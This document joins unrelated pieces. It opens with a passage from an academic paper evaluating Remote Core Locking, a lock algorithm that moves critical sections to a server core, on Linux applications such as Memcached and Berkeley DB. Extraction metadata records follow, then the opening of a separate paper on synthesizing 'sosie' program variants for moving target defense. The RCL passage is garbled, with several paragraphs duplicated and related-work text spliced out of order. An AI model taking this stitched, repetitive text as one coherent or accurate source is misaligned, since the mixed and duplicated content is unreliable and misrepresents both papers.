long-lived renaming algorithm [6] that keeps track of the highest client identifier and tries to reallocate smaller ones. The slow path is executed if the active servicing thread detects that other servicing threads exist (line 17). If the other servicing threads are all executing critical sections (line 18), the servicing thread simply yields the processor (line 19). Otherwise, it goes to sleep (lines 21-24). Executing a critical section A client that tries to acquire an RCL or a servicing thread that tries to acquire an RCL managed by another core submits a request and waits for the function pointer to be cleared (Alg. 2, lines 6-9). If the RCL is managed by the same core, the servicing thread must actively wait until the lock is free. During this time it repetitively yields, to give the CPU to the thread that owns the lock (lines 11-12). Management and backup threads If, on wake up, the management thread observes, based on the value of \[ isalive, \] that none of the servicing threads has progressed since the previous timeout, then it ensures that at least one free thread exists (Alg. 3, lines 8-19) and forces the election (lines 20-27) of a thread that has not been recently elected. The backup thread (lines 31-34) simply sets is alive to false and wakes up the management thread. 4 Evaluation We first present a microbenchmark that identifies when critical sections execute faster with RCL than with the other lock algorithms. We then correlate this information with the results of the profiler, so that a developer can use the profiler to identify which locks to transform into RCLs. Finally, we analyze the performance of the applications identified by the profiler for all lock algorithms. Our evaluations are performed on a 48-core machine having four 12-core Opteron 6172 processors, running Ubuntu 11.10 (Linux 3.0.0), with gcc 4.6.1 and glibc 2.13. We have developed a custom microbenchmark to measure the performance of RCL relative to four other lock algorithms: CAS Spinlock, POSIX, MCS [18] and Flat Combining [13]. These algorithms are briefly presented in Fig. 6. To our knowledge, MCS and Flat Combining are currently the most efficient. <table> <thead> <tr> <th>Spinlock</th> <th>CAS loop on a shared cache line.</th> </tr> </thead> <tbody> <tr> <td>POSIX</td> <td>CAS, then sleep.</td> </tr> <tr> <td>MCS</td> <td>CAS to insert the pending CS at the end of a shared queue. Busy wait for completion of the previous CS on the queue.</td> </tr> <tr> <td>Flat Combining</td> <td>Periodic CAS to elect a client that acts as a server, periodic collection of unused requests. Provides a generic interface, but not combining, as appropriate to support legacy applications: server only iterates over the list of pending requests.</td> </tr> </tbody> </table> Fig. 6: The evaluated lock algorithms. Our microbenchmark executes critical sections repeatedly on all cores, except one that manages the lifecycle of the threads. For RCL, this core also executes the RCL server. We vary the degree of contention on the lock by varying the delay between the execution of the critical sections: the shorter the delay, the higher the contention. We also vary the locality of the critical sections by varying the number of shared cache lines each one accesses (references and updates). To ensure that cache line accesses are not pipelined, we construct the address of the next memory access from the previously read value [30]. Fig. 7(a) presents the average number of L2 cache misses (top) and the average execution time of a critical section (bottom) over 5000 iterations when critical sections access one shared cache line. This experiment measures the effect of lock access contention. Fig. 7(b) then presents the increase in execution time incurred when each critical section instead accesses 5 cache lines. This experiment measures the effect of data locality of shared cache lines. Highlights are summarized in Fig. 7(c). With one shared cache line, at high contention, RCL performs better because Flat Combining has to periodically elect a new combiner. At low contention, RCL is slower than Spinlock by only 209 cycles. This is negligible since the lock is seldom used. In this case, Flat Combining is not efficient because after executing its critical section, the combiner must iterate over the list of requests before resuming its own work. RCL incurs the same number of cache misses when each critical section accesses 5 cache lines as it does for --- 3Using the SSE3 monitor/wait instructions on the client side when waiting for a reply from the server, as described in Sec. 2.1, induces a latency overhead of less than 30% at both high and low contention. This makes the energy-efficient version of RCL quantitatively similar to the original RCL implementation presented here. one cache line, as the data remains on the RCL server. At low contention, each request is served immediately, and the performance difference is also quite low. At higher contention, each critical section has to wait for the others to complete, incurring an increase in execution time of roughly 47 times the increase at low contention. Like RCL, Flat Combining has few or no extra cache misses at high contention, because cache lines stay with the combiner, which acts as a server. At low contention, the number of extra cache misses is variable, because the combiner often has no other critical sections to execute. These extra cache misses increase the execution time. POSIX and MCS have 4 extra cache misses when reading the 4 extra cache lines, and incur a corresponding execution time increase. Finally, Spinlock is particularly degraded at high contention when accessing 5 cache lines, as the longer duration of the critical section increases the amount of time the thread spins, and thus the number of CAS it executes. To estimate which locks should be transformed into RCLs, we correlate the percentage of time spent in critical sections observed using the profiler with the critical section execution times observed using the microbenchmark. Fig. 8 shows the result of applying the profiler to the microbenchmark in the one cache line case with POSIX locks. To know when RCL becomes better than all other locks, we focus on POSIX and MCS: Flat Combining is always less efficient than RCL and Spinlock is only efficient at very low contention. We have marked the delays at which, as shown in Fig. 7(a), the critical section execution time begins to be significantly higher when using POSIX and MCS than when using RCL. RCL becomes more efficient than POSIX when 20% of the application time is devoted to critical sections, and it becomes more efficient than MCS when this ratio is 70%. These results are preserved, or improved, as the number of accessed cache lines increases, because the execution time increases more for the other algorithms than for RCL. To know when RCL becomes better than all other locks, we focus on POSIX and MCS: Flat Combining is always less efficient than RCL and Spinlock is only efficient at very low contention. We have marked the delays at which, as shown in Fig. 7(a), the critical section execution time begins to be significantly higher when using POSIX and MCS than when using RCL. RCL becomes more efficient than POSIX when 20% of the application time is devoted to critical sections, and it becomes more efficient than MCS when this ratio is 70%. These results are preserved, or improved, as the number of accessed cache lines increases, because the execution time increases more for the other algorithms than for RCL. --- 4Our analysis assumes that the targeted applications use POSIX locks, but a similar analysis could be made for any type of lock. --- 4Application performance The two metrics offered by the profiler, i.e. the time spent in critical sections and the number of cache misses, do not, of course, completely determine whether an application will benefit from RCL. Many other factors (critical section length, interactions between locks, etc.) affect critical section execution. We find, however, that using the time spent in critical sections as our main metric and the number of cache misses in critical sections as a secondary metric works well; the former is a good indicator of contention, and the latter of data locality. To evaluate the performance of RCL, we have measured the performance of applications listed in Fig. 3 with the lock algorithms listed in Fig. 7. Memcached with Flat Combining is omitted, because it periodically blocks on condition variables, which Flat Combining does not support. We present only the results for the applications (and locks) that the profiler indicates as potentially interesting. Replacing the other locks has no performance impact. Fig. 9(a) presents the results for all of the applications for which the profiler identified a single lock as the bottleneck. For RCL, each of these applications uses only one server core. Thus, for RCL, we consider that we use \(N\) cores if we have \(N - 1\) threads and 1 server, while we consider that we use \(N\) cores if we have \(N\) threads for the other lock algorithms. The top of the figure (\(x\alpha : n/m\)) reports the improvement \(\alpha\) over the execution time of the original application on one core, the number \(n\) of cores that gives the shortest execution time (i.e., the scalability peak), and the minimal number \(m\) of cores for which RCL is faster than all other locks. The histograms show the ratio of the shortest execution time for each application using POSIX locks to the shortest execution time with each of the other lock algorithms.\(^5\) Fig. 9(b) presents the results for Berkeley DB with 100 clients (and hence 100 threads) running TPC-C’s Order Status and Stock Level transactions. Since MCS cannot handle more than 48 threads, due to the convoy effect, we have also implemented MCS-TP \([12]\), a variation of MCS with a spinning timeout to resist convoys. In the case of RCL, the two most used locks have been placed on two different RCL servers, leaving 46 cores for the clients. Additionally, we study the impact of the number of simultaneous clients on the number of transactions treated per second for Stock Level transactions (see Fig. 11). **Performance analysis** For the applications that spend 20-70\% of their time in critical sections when using POSIX locks (Raytrace/Balls4, String Match, and Memcached/Set), RCL gives significantly better performance than POSIX locks, but in most cases it gives about the same performance as MCS and Flat Combining, as predicted by our microbenchmark. For Memcached/Set, however, which spends only 54\% of the time in critical sections when using POSIX locks, RCL gives a large improvement over all other approaches, because it significantly improves cache locality. When using POSIX locks, Memcached/Set critical sections have on average 32.7 cache misses, which roughly correspond to accesses to 30 shared cache lines, plus the cache misses incurred for the management of POSIX locks. Using RCL, the 30 shared cache lines remain in the server cache. Fig. 10 shows that for Memcached/Set, RCL performs worse than other locks when fewer than four cores are used due to the fact that one core is lost for the server, but from 5 cores onwards, this effect is compensated by the performance improvement offered by RCL. \(^5\)For Memcached, the execution time is the time for processing 10,000 requests. only a slight performance improvement. This application is intrinsically unable to scale for the considered data set; even though the use of RCL reduces the amount of time spent in critical sections to 1% (Fig. 12), the best resulting speedup is only 5.8 times for 20 cores. Memcached/Get spends more than 80% of its time in critical sections, but is only slightly improved by RCL as compared to MCS. Its critical sections are long and thus acquiring and releasing locks is less of a bottleneck than with other applications. In the case of Berkeley DB, RCL achieves a speedup of 4.3 for Order Status transactions and 7.7 for Stock Level transactions with respect to the original Berkeley DB implementation for 100 clients. This is better than expected, since, according to our profiler, the percentage of time spent in critical sections is respectably only 53% and 55%, i.e. less than the 70% threshold. This is due to the fact that Berkeley DB uses hybrid Test-And-Set/POSIX locks, and our profiler was designed for POSIX locks: the time spent in the Test-And-Set loop is not included in the "time in critical sections" metric. When the number of clients increases, the throughput of all implementations degrades. Still, RCL performs better than the other lock algorithms, even though two cores are reserved for the RCL servers and thus do not directly handle requests. In fact, the cost of the two server cores is amortized from 5 clients onwards. The best RCL speedup over the original implementation is for 40 clients with a ratio of 14 times. POSIX is robust for a large number of threads and comes second after RCL. MCS-TP [12] resists convoys but with some overhead. MCS-TP and Flat Combining have comparable performance. Locality analysis Figure 12 presents the number of L2 cache misses per critical section observed on the RCL server for the evaluated applications. Critical sections trigger on average fewer than 4 cache misses, of which the communication between the client and the server itself costs one cache miss. Thus, on average, at most 3 cache lines of context information are accessed per critical section. This shows that passing variables to and from the server does not hurt performance in the evaluated applications. <table> <thead> <tr> <th>Application</th> <th>L2 cache misses on the RCL server</th> </tr> </thead> <tbody> <tr> <td>Raytrace/Car</td> <td>1.8</td> </tr> <tr> <td>Raytrace/Ball4</td> <td>1.8</td> </tr> <tr> <td>Linear Regression</td> <td>2.4</td> </tr> <tr> <td>Matrix Multiply</td> <td>3.2</td> </tr> <tr> <td>String Match</td> <td>3.2</td> </tr> <tr> <td>Memcached/Get</td> <td>N/A†</td> </tr> <tr> <td>Memcached/Set</td> <td>N/A†</td> </tr> <tr> <td>Berkeley DB/Order Status</td> <td>3.3</td> </tr> <tr> <td>Berkeley DB/Stock Level</td> <td>3.6</td> </tr> </tbody> </table> † We are currently unable to collect L2 cache misses when using blocking on RCL servers. False Serialization A difficulty in transforming Berkeley DB for use with RCL is that the call in the source code that allocates the two most used locks also allocates nine other less used locks. The RCL runtime requires that for a given lock allocation site, all allocated locks are implemented in the same way, and thus all 11 locks must be implemented as RCLs. If all 11 locks are on the same server, their critical sections are artificially serialized. To prevent this, the RCL runtime makes it possible to choose the server core where each lock will be dispatched. To study the impact of this false serialization, we consider two metrics: false serialization rate and use rate. The false serialization rate is the ratio of the number of iterations over the request array where the server finds critical sections associated with at least two different locks to the number of iterations where at least one critical section is executed. The use rate measures the server workload. It is computed as the total number of executed critical sections divided by the number of iterations where at least one critical section is executed. The use rate measures the server workload. It is computed as the total number of executed critical sections divided by the number of iterations where at least one critical section is executed. 6 The use rate measures the server workload. It is computed as the total number of executed critical sections divided by the number of iterations where at least one critical section is executed, giving the average number of clients waiting for a critical section on each iteration, which is then divided by the number of cores. Therefore, a use rate of 1.0 means that all elements of the array contain pending critical section requests, whereas a low use rate means that the server mostly spins on the request array, waiting for critical sections to execute. Fig. 13 shows the false serialization rate and the use rate for Berkeley DB (100 clients, Stock Level): (i) with one server for all locks, and (ii) with two different servers for the two most used locks as previously described. Using one server, the false serialization rate is high and has a significant impact because the use rate is also high. When using two servers, the use rate of the two servers goes down to 5% which means that they are no longer saturated and that false serialization is eliminated. This allows us to improve the throughput by 50%. 6We do not divide by the total number of iterations, because there are many iterations in application startup and shutdown that execute no critical sections and have no impact on the overall performance. works on legacy hardware and allows blocking. This can be a problem with legacy library code. RCL and databases designed with manycore architectures in mind use data replication to improve locality [28] and even RPC-like mechanisms to access shared data from remote cores [4, 7, 11, 19, 22]. These solutions, however, require a complete overhaul of the operating system or database design. RCL, on the other hand, can be used with current systems and applications with few modifications. 5 Related Work Many approaches have been proposed to improve locking [1, 8, 13, 15, 24, 26, 27]. Some improve the fairness of lock algorithms or reduce the data bus load [8, 24]. Others switch automatically between blocking locks and spinlocks depending on the contention rate [15]. Others, like RCL, address data locality [13, 27]. GLocks [1] addresses at the hardware level the problem of latency due to cache misses of highly-contended locks by using a token-ring between cores. When a core receives the token, it serves a pending critical section, if it has one, and then forwards the token. However, only one token is used, so only one lock can be implemented. Suleman et al. [27] transform critical sections into remote procedure calls to a powerful server core on an asymmetric multicore. Their communication protocol is also implemented in hardware and requires a modified processor. They do not address blocking within critical sections, which can be a problem with legacy library code. RCL works on legacy hardware and allows blocking. Flat Combining [13], temporarily transforms the owner of a lock into a server for other critical sections. Flat Combining is unable to handle blocking in a critical section, because there is only one combiner. At low contention, Flat Combining is not efficient because the combiner has to check whether pending requests exist, in addition to executing its own code. In RCL, the server may also uselessly scan the array of pending requests, but as the server has no other code to execute, it does not incur any overall delay. Sridharan et al. [26] increase data locality by associating an affinity between a core and a lock. The affinity is determined by intercepting Futex [9] operations and the Linux scheduler is modified so as to schedule the lock requester to the preferred core of the lock. This technique does not address the access contention that occurs when several cores try to enter their critical sections. Roy et al. [23] have proposed a profiling tool to identify critical sections that work on disjoint data sets, in order to optimize them by increasing parallelism. This approach is complementary to ours. Lock-free structures have been proposed in order to avoid using locks for traditional data structures such as counters, linked lists, stacks, or hashtables [14, 16, 25]. These approaches never block threads. However, such techniques are only applicable to the specific types of data structures considered. For this reason, locks are still commonly used on multicore architectures. Finally, experimental operating systems and databases designed with manycore architectures in <table> <thead> <tr> <th></th> <th>False serialization rate</th> <th>Use rate</th> <th>Transactions/s</th> </tr> </thead> <tbody> <tr> <td>One server</td> <td>91%</td> <td>81%</td> <td>13.9</td> </tr> <tr> <td>Two servers</td> <td>&lt;1% / &lt;1%</td> <td>5% / 5%</td> <td>28.7</td> </tr> </tbody> </table> Fig. 13: Impact of false serialization with RCL. 6 Conclusion RCL is a novel locking technique that focuses on both reducing lock acquisition time and improving the execution speed of critical sections through increased data locality. The key idea is to migrate critical-section execution to a server core. We have implemented an RCL runtime for Linux that supports a mixture of RCL and POSIX locks in a single application. To ease the reengineering of legacy applications, we have designed a profiling-based methodology for detecting highly contended locks and implemented a tool that transforms critical sections into remote procedure calls. Our performance evaluations on legacy benchmarks and widely used legacy applications show that RCL improves performance when an application relies on highly contended locks. In future work, we will consider the design and implementation of an adaptive RCL runtime. Our first goal will be to be able to dynamically switch between locking strategies, so as to dedicate a server core only when a lock is contended. Second, we want to be able to migrate locks between multiple servers, to dynamically balance the load and avoid false serialization. One of the challenges will be to implement low-overhead run-time profiling and migration strategies. Finally, we will explore the possibilities of RCL for designing new applications. Availability The implementation of RCL as well as our test scripts and results are available at http://rclrepository.gforge.inria.fr. Acknowledgments We would like to thank Alexandra Fedorova and our shepherd Wolfgang Schröder-Preikschat for their insightful comments and suggestions. References
{"Source-Url": "http://www-public.imtbs-tsp.eu/~thomas_g/research/biblio/2012/lozi12usenix-rcl.pdf", "len_cl100k_base": 9837, "olmocr-version": "0.1.53", "pdf-total-pages": 12, "total-fallback-pages": 0, "total-input-tokens": 47347, "total-output-tokens": 12012, "length": "2e13", "weborganizer": {"__label__adult": 0.0003993511199951172, "__label__art_design": 0.0003719329833984375, "__label__crime_law": 0.0004334449768066406, "__label__education_jobs": 0.0005474090576171875, "__label__entertainment": 0.0001137852668762207, "__label__fashion_beauty": 0.00019371509552001953, "__label__finance_business": 0.00030350685119628906, "__label__food_dining": 0.0003662109375, "__label__games": 0.0010328292846679688, "__label__hardware": 0.003551483154296875, "__label__health": 0.0005817413330078125, "__label__history": 0.00044918060302734375, "__label__home_hobbies": 0.00012981891632080078, "__label__industrial": 0.0007243156433105469, "__label__literature": 0.0002455711364746094, "__label__politics": 0.0003859996795654297, "__label__religion": 0.0006532669067382812, "__label__science_tech": 0.1448974609375, "__label__social_life": 8.255243301391602e-05, "__label__software": 0.012420654296875, "__label__software_dev": 0.83056640625, "__label__sports_fitness": 0.000385284423828125, "__label__transportation": 0.000820159912109375, "__label__travel": 0.0002512931823730469}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 51122, 0.03041]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 51122, 0.26902]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 51122, 0.90886]], "google_gemma-3-12b-it_contains_pii": [[0, 4283, false], [4283, 9572, null], [9572, 15393, null], [15393, 19032, null], [19032, 22851, null], [22851, 26357, null], [26357, 29250, null], [29250, 32699, null], [32699, 35896, null], [35896, 41609, null], [41609, 47090, null], [47090, 51122, null]], "google_gemma-3-12b-it_is_public_document": [[0, 4283, true], [4283, 9572, null], [9572, 15393, null], [15393, 19032, null], [19032, 22851, null], [22851, 26357, null], [26357, 29250, null], [29250, 32699, null], [32699, 35896, null], [35896, 41609, null], [41609, 47090, null], [47090, 51122, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 51122, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 51122, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 51122, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 51122, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 51122, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 51122, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 51122, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 51122, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 51122, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 51122, null]], "pdf_page_numbers": [[0, 4283, 1], [4283, 9572, 2], [9572, 15393, 3], [15393, 19032, 4], [19032, 22851, 5], [22851, 26357, 6], [26357, 29250, 7], [29250, 32699, 8], [32699, 35896, 9], [35896, 41609, 10], [41609, 47090, 11], [47090, 51122, 12]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 51122, 0.12422]]}
olmocr_science_pdfs
2024-12-06
2024-12-06
b202021bfe5c18e321bf521b59ad04c51e2edf09
[REMOVED]
{"len_cl100k_base": 10321, "olmocr-version": "0.1.53", "pdf-total-pages": 12, "total-fallback-pages": 0, "total-input-tokens": 65519, "total-output-tokens": 13333, "length": "2e13", "weborganizer": {"__label__adult": 0.0003476142883300781, "__label__art_design": 0.000705718994140625, "__label__crime_law": 0.0003559589385986328, "__label__education_jobs": 0.002223968505859375, "__label__entertainment": 0.00011813640594482422, "__label__fashion_beauty": 0.0002052783966064453, "__label__finance_business": 0.00041294097900390625, "__label__food_dining": 0.0003437995910644531, "__label__games": 0.0006380081176757812, "__label__hardware": 0.001323699951171875, "__label__health": 0.0005793571472167969, "__label__history": 0.00044465065002441406, "__label__home_hobbies": 0.0001327991485595703, "__label__industrial": 0.0006489753723144531, "__label__literature": 0.0004274845123291016, "__label__politics": 0.0002970695495605469, "__label__religion": 0.0005307197570800781, "__label__science_tech": 0.173095703125, "__label__social_life": 0.00014960765838623047, "__label__software": 0.01512908935546875, "__label__software_dev": 0.80078125, "__label__sports_fitness": 0.00025463104248046875, "__label__transportation": 0.0007052421569824219, "__label__travel": 0.0002160072326660156}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 61713, 0.03122]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 61713, 0.44999]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 61713, 0.9182]], "google_gemma-3-12b-it_contains_pii": [[0, 4729, false], [4729, 11377, null], [11377, 19024, null], [19024, 24313, null], [24313, 27591, null], [27591, 30066, null], [30066, 35131, null], [35131, 38451, null], [38451, 42567, null], [42567, 49817, null], [49817, 59277, null], [59277, 61713, null]], "google_gemma-3-12b-it_is_public_document": [[0, 4729, true], [4729, 11377, null], [11377, 19024, null], [19024, 24313, null], [24313, 27591, null], [27591, 30066, null], [30066, 35131, null], [35131, 38451, null], [38451, 42567, null], [42567, 49817, null], [49817, 59277, null], [59277, 61713, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 61713, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 61713, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 61713, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 61713, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 61713, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 61713, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 61713, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 61713, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 61713, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 61713, null]], "pdf_page_numbers": [[0, 4729, 1], [4729, 11377, 2], [11377, 19024, 3], [19024, 24313, 4], [24313, 27591, 5], [27591, 30066, 6], [30066, 35131, 7], [35131, 38451, 8], [38451, 42567, 9], [42567, 49817, 10], [49817, 59277, 11], [59277, 61713, 12]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 61713, 0.0]]}
olmocr_science_pdfs
2024-12-10
2024-12-10
53232d21bb1828f18e15cd04e16e2fbe3a3bf9fc
[REMOVED]
{"len_cl100k_base": 10159, "olmocr-version": "0.1.53", "pdf-total-pages": 10, "total-fallback-pages": 0, "total-input-tokens": 35576, "total-output-tokens": 11700, "length": "2e13", "weborganizer": {"__label__adult": 0.0005173683166503906, "__label__art_design": 0.00046896934509277344, "__label__crime_law": 0.0006394386291503906, "__label__education_jobs": 0.0009946823120117188, "__label__entertainment": 0.0001646280288696289, "__label__fashion_beauty": 0.00023186206817626953, "__label__finance_business": 0.0022144317626953125, "__label__food_dining": 0.0004181861877441406, "__label__games": 0.0012636184692382812, "__label__hardware": 0.00223541259765625, "__label__health": 0.0011243820190429688, "__label__history": 0.0005283355712890625, "__label__home_hobbies": 0.00017690658569335938, "__label__industrial": 0.0009255409240722656, "__label__literature": 0.0003943443298339844, "__label__politics": 0.0004489421844482422, "__label__religion": 0.0005936622619628906, "__label__science_tech": 0.3642578125, "__label__social_life": 0.0001423358917236328, "__label__software": 0.020233154296875, "__label__software_dev": 0.6005859375, "__label__sports_fitness": 0.0003974437713623047, "__label__transportation": 0.0008168220520019531, "__label__travel": 0.0002808570861816406}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 47701, 0.02014]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 47701, 0.73848]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 47701, 0.90223]], "google_gemma-3-12b-it_contains_pii": [[0, 3855, false], [3855, 10469, null], [10469, 16153, null], [16153, 21220, null], [21220, 27185, null], [27185, 31896, null], [31896, 36203, null], [36203, 40605, null], [40605, 44010, null], [44010, 47701, null]], "google_gemma-3-12b-it_is_public_document": [[0, 3855, true], [3855, 10469, null], [10469, 16153, null], [16153, 21220, null], [21220, 27185, null], [27185, 31896, null], [31896, 36203, null], [36203, 40605, null], [40605, 44010, null], [44010, 47701, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 47701, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 47701, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 47701, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 47701, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 47701, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 47701, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 47701, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 47701, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 47701, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 47701, null]], "pdf_page_numbers": [[0, 3855, 1], [3855, 10469, 2], [10469, 16153, 3], [16153, 21220, 4], [21220, 27185, 5], [27185, 31896, 6], [31896, 36203, 7], [36203, 40605, 8], [40605, 44010, 9], [44010, 47701, 10]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 47701, 0.02344]]}
olmocr_science_pdfs
2024-12-06
2024-12-06
c9afe5d2e1693c884a8442fbbeee3dda632847ce
Tailored Source Code Transformations to Synthesize Computationally Diverse Program Variants Benoit Baudry, Simon Allier, Martin Monperrus To cite this version: HAL Id: hal-00938855 https://hal.archives-ouvertes.fr/hal-00938855 Submitted on 29 Jan 2014 Tailored Source Code Transformations to Synthesize Computationally Diverse Program Variants Benoit Baudry INRIA/IRISA Rennes, France benoit.baudry@inria.fr Simon Allier INRIA/IRISA Rennes, France simon.allier@inria.fr Martin Monperrus University of Lille & INRIA Lille, France martin.monperrus@univ-lille1.fr ABSTRACT The predictability of program execution provides attackers a rich source of knowledge who can exploit it to spy or remotely control the program. Moving target defense addresses this issue by constantly switching between many diverse variants of a program, which reduces the certainty that an attacker can have about the program execution. The effectiveness of this approach relies on the availability of a large number of software variants that exhibit different executions. However, current approaches rely on the natural diversity provided by off-the-shelf components, which is very limited. In this paper, we explore the automatic synthesis of large sets of program variants, called sosies. Sosies provide the same expected functionality as the original program, while exhibiting different executions. They are said to be computationally diverse. This work addresses two objectives: comparing different transformations for increasing the likelihood of sosie synthesis (densifying the search space for sosies); demonstrating computation diversity in synthesized sosies. We synthesized 30,184 sosies in total, for 9 large, real-world, open source applications. For all these programs we identified one type of program analysis that systematically increases the density of sosies; we measured computation diversity for sosies of 3 programs and found diversity in method calls or data in more than 40% of sosies. This is a step towards controlled massive unpredictability of software. 1. INTRODUCTION Predictability of software execution is a weakness with respect to cybersecurity. For example, the ability to predict a program’s memory layout or the set of machine code instructions allows attackers to design code injection attacks. All solutions that address the mitigation of these weaknesses are founded on the diversification of programs or their environments. For example, address space layout randomization introduces artificial diversity by randomizing the memory location of certain system components. The objective is to make the memory layout unpredictable from one machine to another, or even from one run of the program to another. Similarly, instruction set randomization generates a diversity of machine instructions to prevent the predictability of the assembly language for a given architecture. More recently, moving target defense proposes to use a large number of program variants and to continually shift between them at runtime. This approach aims at making the attack space unpredictable to the attacker by reducing the predictability about a program’s control or data-flow. The success of moving target defense relies on two essential ingredients: the availability of a large number of program variants that implement diverse executions, and; the ability of switching between variants at runtime. This work focuses on the first ingredient. We propose a novel technique to automatically synthesize a large set of program variants that provide the same expected functionality as the original program and yet exhibit computation diversity. We define a novel form of program variant that we call sosie programs (“sosie” is French for “look-alike”). P’ is said to be a sosie of a program P if the code of P’ is different from P and P’ still exhibits the same verified external behavior as P, i.e., still passes the same test suite as P. This work compares different program transformations for the automatic synthesis of sosie programs. The process consists of searching for program variants satisfying our sosie definition is called “sosiefication”, the set of all possible program variants obtainable with the transformations forms the search space of sosie synthesis. All the considered transformations have a random component to explore the space of all program variants. Yet, from an engineering perspective, randomness does not mean inefficient, and we want these transformations to produce large quantities of sosies in a reasonable amount of time. The goal of the transformations is thus to increase the likelihood of sosie synthesis, given a fixed budget (e.g. time or resources). Consequently, we compare different kinds of program analysis and transformations with respect to their ability of confining the search in a space in which the density of potential sosies is high. Also, with respect to moving target defense, the resulting sosies must exhibit executions different from the one of the original program. We measure this diversity in terms of divergence in method calls and data between sosies and the original. Acknowledgements: We thank Ioannis Kavvouras for his participation to the experimentation, Westley Weimer and Eric Schulte for their expert feedback on this paper, as well as our colleagues for insightful discussions and feedback. This work is partially supported by the EU FP7-ICT-2011-9 No. 600654 DIVERSIFY project. We present an extensive evaluation of the synthesis of sosie programs. We set up 9 program transformations, some of them being purely random while others involve some program analysis. They are all based on the same idea of removing, adding or replacing statements in source code. The transformations are applicable to Java programs and applied on 9 open source code bases. This enables us to answer two main research questions: 1) what are the most fruitful synthesis techniques to generate sosie programs (sosies density)? 2) how is the execution of sosies different from the execution of the original program (computational diversity)? To sum up, the contributions of the paper are: - the definition of “sosie program” and “sosiefication”; - 9 source code transformations for the automatic synthesis of sosie programs; - the empirical evidence of the existence of very large quantities of software sosies given our transformations and dataset in Java; - the empirical evaluation of the effectiveness of those different transformations with respect to sosies density and computational diversity. The paper is organized as follows. Section 2 defines the concepts of “sosie software” and “sosiefication”. Section 3 presents a large scale empirical study on the presence of software sosies and the difficulty of synthesizing them. Section 4 outlines the related work and section 5 sets up a research agenda on the exploitation of computational diversity. 2. SOFTWARE SOSIES In this section we define what a “software sosie” is. We discuss an automatic synthesis process of software sosies based on source code transformation and static analysis. We describe how the process can be configured with different transformation strategies. 2.1 Definition of Software Sosie **Definition 1. Sosie (noun).** Given a program P, a test suite TS for P and a program transformation T, a variant P′ = T(P) is a sosie of P if the two following conditions hold 1) there is at least one test case in TS that executes the part of P that is modified by T 2) all test cases in TS pass on P'. Sosies are identical to the original program with respect to the test suite: they have the same observed behavior as P. The word sosie is a French word that literally means “look alike”: there exists “sosies” of Madonna (the famous singer). Since software sosies do not have a visual component, we propose the term “sosie” as an alternative to “look alike”. From a behavioral perspective, the sosies of P “look like” P, since they exhibit the same observable behavior. The objective of sosies is to provide behaviorally identical yet computationally diverse variants of a program. **Definition 2. Sosiefication.** Sosiefication is the process of synthesizing software sosies. Sosie synthesis is performed through source code transformation on a program P and produces program variants, some of being sosies. The ultimate sosiefication process for sosie synthesis would ensure for sure that 1) the resulting program will be a sosie and 2) the resulting program will be computationally diverse (i.e. its execution would be different w.r.t. to a domain specific monitoring security criteria). This is a hard problem, 